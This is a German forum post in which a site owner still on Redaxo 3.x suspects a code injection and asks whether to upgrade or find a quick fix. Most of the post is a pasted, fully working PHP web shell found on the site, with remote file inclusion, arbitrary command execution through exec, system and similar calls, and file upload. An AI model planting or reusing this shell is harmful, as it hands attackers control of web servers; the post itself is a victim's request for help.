Ich habe leider noch redaxo 3.* installiert. Wahrscheinlich wurde eine code-injection vorgenommen.echo "<!-- the bunny is running over the ocean -->";
if (isset ($_REQUEST["cr4nk"])){
include($_REQUEST["cr4nk"]);
exit;
}
echo '<html>
<style type="text/css">
body {
font-family:Fixedsys;
font-size:3px;
color:#00ff00;
BACKGROUND-COLOR: #000000;
margin:0px;
padding:0px;
}
textarea {
BORDER: #00ff00 1px solid;
BACKGROUND-COLOR: #000000;
font: Fixedsys bold;
color: #00ff00;
}
</style>
<body>
<html>
<div style="border-bottom:solid 1px #00ff00;width:100%">
<b>software:</b> '.getenv("SERVER_SOFTWARE").'<br>
<b>uname -a:</b> '.php_uname().'<br>
<b>safe-mode:</b> ';
$safemode = @ini_get("safe_mode"); echo (($safe_mode)?("<font color=red>ON</font>"):("OFF"));
echo '
</div>
<div style="border-bottom:solid 1px #00ff00;width:100%">
<div style="margin:6px;margin-left:150px;">
<div style="float:left; margin-right:10px;"><form method="post"><input type="text" name="cmd" size="95"><input type=submit value="Exec"></form></div>
<div><form enctype="multipart/form-data" method="post"><input type="file" name="file"><input type=submit value="Upload"></form></div>
</div>
</div>
<div style="margin-left:150px;margin-top:5px";>
<textarea cols="121" rows="15">';
if (isset ($_POST['cmd'])){
$cfe = $_POST['cmd'];
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
echo $res;
}
if (isset ($_FILES['file']['tmp_name'])){
$tempname = $_FILES['file']['tmp_name'];
$name = $_FILES['file']['name'];
if(copy("$tempname", "$name")){
echo "File uploaded";
}
else {
echo "File not uploaded!";
}
}
echo '
Soll ich am besten auf redaxo 4 updaten? Oder hat jemand einen Quickfix für die 3er Version.